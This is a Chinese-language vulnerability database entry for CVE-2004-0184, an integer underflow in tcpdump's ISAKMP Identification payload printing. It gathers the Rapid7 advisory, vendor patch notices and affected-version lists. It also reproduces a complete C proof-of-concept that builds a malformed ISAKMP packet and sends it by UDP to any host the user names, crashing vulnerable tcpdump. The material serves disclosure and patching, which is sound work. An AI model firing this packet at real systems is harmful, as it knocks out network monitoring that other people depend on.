CVE-2004-0184
CVSS5.0
发布时间 :2004-05-04 00:00:00
修订时间 :2016-10-17 22:41:34
NMCOEPS    

[原文]Integer underflow in the isakmp_id_print for TCPDUMP 3.8.1 and earlier allows remote attackers to cause a denial of service (crash) via an ISAKMP packet with an Identification payload with a length that becomes less than 8 during byte order conversion, which causes an out-of-bounds read, as demonstrated by the Striker ISAKMP Protocol Test Suite.


[CNNVD]TCPDump ISAKMP标识负载远程整数溢出漏洞(CNNVD-200405-024)

        
        Tcpdump是一款监视网络通信和协议分析工具。
        Tcpdump的ISAKMP包显示函数在处理标识负载(Identification payloads)时存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击或以进程权限执行任意指令。
        带有畸形标识负载的ISAKMP包,如果自报告(self-reported)负载长度比8小,在当字节序转换时会由于读取snap缓冲区之外的数据而引起TCPDUMP崩溃。问题存在于isakmp_id_print()函数的字节序转换中:
         if (sizeof(*p) < id.h.len)
         data = (u_char *)(p + 1);
         else
         data = NULL;
         len = ntohs(id.h.len) - sizeof(*p);
        如果id.h.len等于256,那么len就会等于:
         ntohs(256) - sizeof(*p)
        在i386架构上会变为负值,引起整数溢出。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:976tcpdump Identification Payload in ISAKMP Packets Vulnerability
oval:org.mitre.oval:def:9581Integer underflow in the isakmp_id_print for TCPDUMP 3.8.1 and earlier allows remote attackers to cause a denial of service (crash) via an I...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0184
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0184
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200405-024
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108067265931525&w=2
(UNKNOWN)  BUGTRAQ  20040330 R7-0017: TCPDUMP ISAKMP payload handling denial-of-service vulnerabilities
http://securitytracker.com/id?1009593
(UNKNOWN)  SECTRACK  1009593
http://www.debian.org/security/2004/dsa-478
(VENDOR_ADVISORY)  DEBIAN  DSA-478
http://www.kb.cert.org/vuls/id/492558
(UNKNOWN)  CERT-VN  VU#492558
http://www.rapid7.com/advisories/R7-0017.html
(VENDOR_ADVISORY)  MISC  http://www.rapid7.com/advisories/R7-0017.html
http://www.redhat.com/support/errata/RHSA-2004-219.html
(UNKNOWN)  REDHAT  RHSA-2004:219
http://www.securityfocus.com/bid/10004
(UNKNOWN)  BID  10004
http://www.tcpdump.org/tcpdump-changes.txt
(UNKNOWN)  CONFIRM  http://www.tcpdump.org/tcpdump-changes.txt
http://www.trustix.org/errata/2004/0015
(UNKNOWN)  TRUSTIX  2004-0015
http://xforce.iss.net/xforce/xfdb/15679
(UNKNOWN)  XF  tcpdump-isakmp-integer-underflow(15679)
https://bugzilla.fedora.us/show_bug.cgi?id=1468
(UNKNOWN)  FEDORA  FEDORA-2004-1468

- 漏洞信息

TCPDump ISAKMP标识负载远程整数溢出漏洞
中危 未知
2004-05-04 00:00:00 2005-10-20 00:00:00
远程  
        
        Tcpdump是一款监视网络通信和协议分析工具。
        Tcpdump的ISAKMP包显示函数在处理标识负载(Identification payloads)时存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击或以进程权限执行任意指令。
        带有畸形标识负载的ISAKMP包,如果自报告(self-reported)负载长度比8小,在当字节序转换时会由于读取snap缓冲区之外的数据而引起TCPDUMP崩溃。问题存在于isakmp_id_print()函数的字节序转换中:
         if (sizeof(*p) < id.h.len)
         data = (u_char *)(p + 1);
         else
         data = NULL;
         len = ntohs(id.h.len) - sizeof(*p);
        如果id.h.len等于256,那么len就会等于:
         ntohs(256) - sizeof(*p)
        在i386架构上会变为负值,引起整数溢出。
        

- 公告与补丁

        厂商补丁:
        LBL
        ---
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        LBL Upgrade tcpdump-3.8.3.tar.gz
        
        http://www.tcpdump.org/release/tcpdump-3.8.3.tar.gz

        Trustix
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Trustix Upgrade libpcap-0.8.2-1tr.i586.rpm
        ftp://ftp.trustix.org/pub/trustix/updates/1.5/rpms/libpcap-0.8.2-1tr.i586.rpm
        Trustix Upgrade tcpdump-3.8.2-1tr.i586.rpm
        ftp://ftp.trustix.org/pub/trustix/updates/1.5/rpms/tcpdump-3.8.2-1tr.i586.rpm

- 漏洞信息 (171)

tcpdump ISAKMP Identification payload Integer Overflow Exploit (EDBID:171)
linux remote
2004-04-05 Verified
0 Rapid7
N/A [点击下载]
/*
 * tcpdump packet sniffer
 * Integer underflow in ISAKMP Identification payload
 * denial of service vulnerability
 * proof of concept code
 * version 1.0 (Apr 02 2004)
 * CVE-ID: CAN-2004-0184
 *
 * by Remi Denis-Courmont < exploit at simphalampin dot com >
 *   www simphalempin com dev 
 * Remi Denis-Courmont is not responsible for the misuse of the
 * source code provided hereafter.
 * 
 * This vulnerability was found by:
 *   Rapid7, LLC Security Advisory - www rapid7 com
 * whose original advisory may be fetched from:
 *   www rapid7 com advisories R7-0017 html
 *
 * Vulnerable:
 *  - tcpdump 3.8.1
 *
 * Not vulnerable:
 *  - tcpdump 3.8.3
 *
 * NOTES:
 *   The vulnerability cannot be exploited to cause a denial of service
 * with the Debian's tcpdump packages as it was partly fixed as part of
 * the fix for earlier known CAN-2003-0108 vulnerability, though the bug
 * is still present. That may be the case for other vendors which were
 * not investigated.
 *
 *   tcpdump must be run with a verbosity level of at least 3:
 * # tcpdump -vvv
 * Otherwise, no denial of service will occur.
 */


#include <string.h>
#include <stdio.h>

#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>

#include <netdb.h>

static const char packet[] =
	/* ISAKMP header */
	"\x00\x00\x00\x00\x00\x00\x00\x00" /* Initiator cookie */
	"\x00\x00\x00\x00\x00\x00\x00\x00" /* Responder cookie */
	"\x05"			/* Next payload: Identification */
	"\x10"			/* Version: 1.0 */
	"\x01"			/* Exchange type */
	"\x00"			/* Flags */
	"\x00\x00\x00\x00"	/* Message ID */
	"\x00\x00\x00\x24"	/* Length */
	
	/* ISAKMP Identification payload */
	"\x00"			/* Next payload: none */
	"\x00"			/* Reserved */
	"\x00\x05"		/* Payload length (incorrect) */
	"\x20"			/* ID type (unknown) */
	"\x00\x00\x00"		/* DOI */
;

static int
send_evil_packet (const struct addrinfo *r)
{
	int fd;
	size_t len;
		
	fd = socket (r->ai_family, r->ai_socktype, r->ai_protocol);
	if (fd == -1)
	{
		perror ("Socket error");
		return 1;
	}

	len = sizeof (packet) - 1;
	if (sendto (fd, packet, len, 0, r->ai_addr, r->ai_addrlen) != len)
	{
		perror ("Packet sending error");
		close (fd);
		return 1;
	}
	
	puts ("Packet sent!");
	close (fd);
	return 0;
}


static int
proof (const char *hostname)
{
	struct addrinfo *res;
	int check;
	
	{
		struct addrinfo help;
		memset (&help, 0, sizeof (help));
		help.ai_socktype = SOCK_DGRAM;
	
		check = getaddrinfo (hostname, "isakmp", &help, &res);
	}
	
	if (check == 0)
	{
		struct addrinfo *ptr;

		for (ptr = res; ptr != NULL; ptr = ptr->ai_next)
			check |= send_evil_packet (ptr);

		freeaddrinfo (res);
		return check;
	}

	fprintf (stderr, "%s: %s\n", hostname, gai_strerror (check));
	return -1;
}


static void
usage (const char *path)
{
	fprintf (stderr, "Usage: %s <hostname/IP>\n", path);
}


int
main (int argc, char *argv[])
{
	puts ("tcpdump Integer underflow in ISAKMP Identification payload\n"
		"proof of concept code\n"
		"Copyright (C) Remi Denis-Courmont 2004 "
		"<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70"
		"\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");
			
			
	if (argc != 2)
	{
		usage (argv[0]);
		return 2;
	}
		
	return proof (argv[1]) ? 1 : 0;
}

// milw0rm.com [2004-04-05]		

- 漏洞信息 (F32981)

Rapid7 Security Advisory 17 (PacketStormID:F32981)
2004-03-30 00:00:00
Rapid7  rapid7.com
advisory,protocol
CVE-2004-0183,CVE-2004-0184
[点击下载]

Rapid7 Security Advisory - tcpdump versions 3.8.1 and below contain multiple flaws in the packet display functions for the ISAKMP protocol. Upon receiving specially crafted ISAKMP packets, tcpdump will try to read beyond the end of the packet capture buffer and crash.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________
                     Rapid7, Inc. Security Advisory
       Visit http://www.rapid7.com/ to download NeXpose,
        the world's most advanced vulnerability scanner.
      Linux and Windows 2000/XP versions are available now!
_______________________________________________________________________

Rapid7 Advisory R7-0017
TCPDUMP ISAKMP payload handling denial-of-service vulnerabilities

   Published:  March 30, 2004
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0017.html

   CVE:    CAN-2004-0183, CAN-2004-0184

1. Affected system(s):

   KNOWN VULNERABLE:
    o TCPDUMP v3.8.1 and earlier versions

2. Summary

   TCPDUMP v3.8.1 and earlier versions contain multiple flaws in the
   packet display functions for the ISAKMP protocol.  Upon receiving
   specially crafted ISAKMP packets, TCPDUMP will try to read beyond
   the end of the packet capture buffer and crash.

3. Vendor status and information

   TCPDUMP
   http://www.tcpdump.org

   The vendor was notified and they have released an updated version
   of TCPDUMP, version 3.8.2, which fixes these defects.  Subsequently,
   the version number was bumped to 3.8.3 to match libpcap.

4. Solution

   Upgrade to version 3.8.3 of TCPDUMP.  You should also consider
   upgrading to version 0.8.3 of libpcap.  Note that many vendors
   package their own customized version of TCPDUMP and libpcap with
   their operating system distribution.  You may want to consider
   contacting your operating system vendor for an upgrade.

5. Detailed analysis

   To test the security and robustness of IPSEC implementations
   from multiple vendors, the security research team at Rapid7
   has designed the Striker ISAKMP Protocol Test Suite.  Striker
   is an ISAKMP packet generation tool that automatically produces
   and sends invalid and/or atypical ISAKMP packets.

   This advisory is the second in a series of vulnerability
   disclosures discovered with the Striker test suite.  Striker
   will be made available to qualified IPSEC vendors.  Please
   email advisory@rapid7.com for more information on obtaining
   Striker.

   There are two defects in the ISAKMP packet display functions in
   TCPDUMP.  Both of them require that verbose packet display be
   enabled with the -v option.  These defects result in out-of-bounds
   reads.

   Overflow in ISAKMP Delete payload with large number of SPI's
   CVE ID: CAN-2004-0183

      When displaying Delete payloads, TCPDUMP does not verify
      that (NSPIS * SPISIZE) fits within the snap buffer.

      An ISAKMP packet with a malformed Delete payload having
      a large self-reported number of SPI's will cause TCPDUMP
      to crash as it tries to read from beyond the end of the
      snap buffer.

      See section 3.15 of RFC 2408 for information on the
      Delete payload format.

   Integer underflow in ISAKMP Identification payload 
   CVE ID: CAN-2004-0184

      An ISAKMP packet with a malformed Identification payload
      with a self-reported payload length that becomes less than
      8 when its byte order is reversed will cause TCPDUMP to
      crash as it tries to read from beyond the end of the
      snap buffer.  TCPDUMP must be using a snaplen of 325 or
      greater for this underflow to be triggered.

      This is due to an inconsistency in the byte order conversion
      in the isakmp_id_print() function:

         if (sizeof(*p) < id.h.len)
            data = (u_char *)(p + 1);
         else 
            data = NULL;
         len = ntohs(id.h.len) - sizeof(*p);

      If id.h.len is equal to, say, 256 (and this fits within the snap
      buffer), then len will be equal to:

         ntohs(256) - sizeof(*p)

      which becomes a negative value on i386.

6. Contact Information

   Rapid7 Security Advisories
   Email:  advisory@rapid7.com
   Web:    http://www.rapid7.com/
   Phone:  +1 (617) 603-0700

7. Disclaimer and Copyright

   Rapid7, LLC is not responsible for the misuse of the information
   provided in our security advisories.  These advisories are a service
   to the professional security community.  There are NO WARRANTIES
   with regard to this information.  Any application or distribution of
   this information constitutes acceptance AS IS, at the user's own
   risk.  This information is subject to change without notice.

   This advisory Copyright (C) 2004 Rapid7, LLC.  Permission is
   hereby granted to redistribute this advisory, providing that no
   changes are made and that the copyright notices and disclaimers
   remain intact.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (OpenBSD)

iD8DBQFAaa48MiAxz4wsmx8RAr4lAJ0Y69TpTaDZkRxARdTdq1iwgRv+RQCeMEw9
Oh6mpCe95vffPgf+7Ku2o+c=
=YXNu
-----END PGP SIGNATURE-----
    

- 漏洞信息

4750
tcpdump ISAKMP Identification Payload DoS
Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-03-31 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

TCPDump ISAKMP Identification Payload Integer Underflow Vulnerability
Unknown 10004
Yes No
2004-03-30 12:00:00 2009-07-12 04:06:00
Discovery is credited to Rapid7.

- 受影响的程序版本

SGI ProPack 3.0
SGI ProPack 2.4
RedHat Linux 9.0 i386
RedHat Linux 7.3
LBL tcpdump 3.8.1
+ Mandriva Linux Mandrake 10.0
LBL tcpdump 3.7.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.1
+ Turbolinux Turbolinux Workstation 6.0
LBL tcpdump 3.7.1
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ S.u.S.E. Linux 8.1
LBL tcpdump 3.7
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
+ FreeBSD FreeBSD 4.5 -STABLE
+ FreeBSD FreeBSD 4.5 -RELEASE
+ FreeBSD FreeBSD 4.5
+ FreeBSD FreeBSD 4.4 -STABLE
+ FreeBSD FreeBSD 4.4 -RELENG
+ FreeBSD FreeBSD 4.4
+ FreeBSD FreeBSD 4.3 -STABLE
+ FreeBSD FreeBSD 4.3 -RELENG
+ FreeBSD FreeBSD 4.3 -RELEASE
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2 -STABLE
+ FreeBSD FreeBSD 4.2 -RELEASE
+ FreeBSD FreeBSD 4.2
LBL tcpdump 3.6.3
+ EnGarde Secure Community 2.0
+ EnGarde Secure Community 1.0.1
+ EnGarde Secure Professional 1.5
+ EnGarde Secure Professional 1.2
+ EnGarde Secure Professional 1.1
LBL tcpdump 3.6.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2
+ FreeBSD FreeBSD 4.1.1
+ FreeBSD FreeBSD 4.1
+ FreeBSD FreeBSD 4.0
+ HP Secure OS software for Linux 1.0
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
LBL tcpdump 3.5.2
LBL tcpdump 3.5 alpha
LBL tcpdump 3.5
+ FreeBSD FreeBSD 4.1.1
+ FreeBSD FreeBSD 4.1
+ FreeBSD FreeBSD 4.0
+ FreeBSD FreeBSD 3.x
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
LBL tcpdump 3.4 a6
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ S.u.S.E. Firewall Adminhost VPN
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux Admin-CD for Firewall
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Enterprise Server for S/390
+ S.u.S.E. Linux Live-CD for Firewall
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 7
LBL tcpdump 3.4
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Apple Mac OS X Server 10.3.5
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.2.8
Apple Mac OS X 10.3.5
Apple Mac OS X 10.3.4
Apple Mac OS X 10.2.8
LBL tcpdump 3.8.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Turbolinux Appliance Server 1.0 Workgroup Edition
+ Turbolinux Appliance Server 1.0 Hosting Edition
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
LBL tcpdump 3.8.2

- 不受影响的程序版本

LBL tcpdump 3.8.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Turbolinux Appliance Server 1.0 Workgroup Edition
+ Turbolinux Appliance Server 1.0 Hosting Edition
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
LBL tcpdump 3.8.2

- 漏洞讨论

tcpdump is prone to a denial of service vulnerability due to an integer underflow.

This issue exists in tcpdump's ISAKMP packet display functions. This issue affects how ISAKMP Identification payloads are handled. This may cause a denial of service.

- 漏洞利用

The following exploit has been provided:

- 解决方案

Mandrake has released an advisory (MDKSA-2004:030) and fixes to address this issue. Mandrake users are advised to apply these fixes as soon as possible. Further information regarding obtaining and applying fixes can be found in the referenced advisory.

Trustix has released an advisory that includes updates for this issue.

Debian has released advisory DSA 478-1 and fixes dealing with this issue.

OpenPKG has provided advisory SA-2004.010 and an update dealing with this issue.

Slackware has released advisory SSA:2004-108-01 to provide fixes for this issue. Please see the attached advisory for details on obtaining and applying fixes.

RedHat has released advisory FEDORA-2004-120 to provide fixes for Fedora. Please see the attached advisory for details on obtaining and applying fixes.

Red Hat has released advisory RHSA-2004:219-07 and fixes to address this and other issues on Red Hat Linux Enterprise platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

This issue is addressed in tcpdump 3.8.3.

Turbolinux has released advisory TLSA-2004-16 to provide fixes for this issue. Please see the attached advisory for details on obtaining and applying fixes.

SGI has released an advisory (20040603-01-U) to address this and other issues in SGI ProPack 3. Please see the referenced advisory for more information.

SGI has released an advisory (20040602-01-U) to address this and other issues in SGI ProPack 2.4. Please see the referenced advisory for more information.

Apple has released an advisory (APPLE-SA-0024-09-07) along with fixes to address this, and many other issues. Please see the referenced advisory for further information.

The Fedora Legacy project has released advisory FLSA:1468 along with fixes to address this, and other issues. Please see the referenced advisory for further information.


Apple Mac OS X 10.2.8

Apple Mac OS X Server 10.2.8

Apple Mac OS X Server 10.3.4

Apple Mac OS X 10.3.4

Apple Mac OS X Server 10.3.5

Apple Mac OS X 10.3.5

SGI ProPack 2.4

SGI ProPack 3.0

LBL tcpdump 3.4 a6

LBL tcpdump 3.4

LBL tcpdump 3.5 alpha

LBL tcpdump 3.5

LBL tcpdump 3.5.2

LBL tcpdump 3.6.2

LBL tcpdump 3.6.3

LBL tcpdump 3.7

LBL tcpdump 3.7.1

LBL tcpdump 3.7.2

LBL tcpdump 3.8.1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站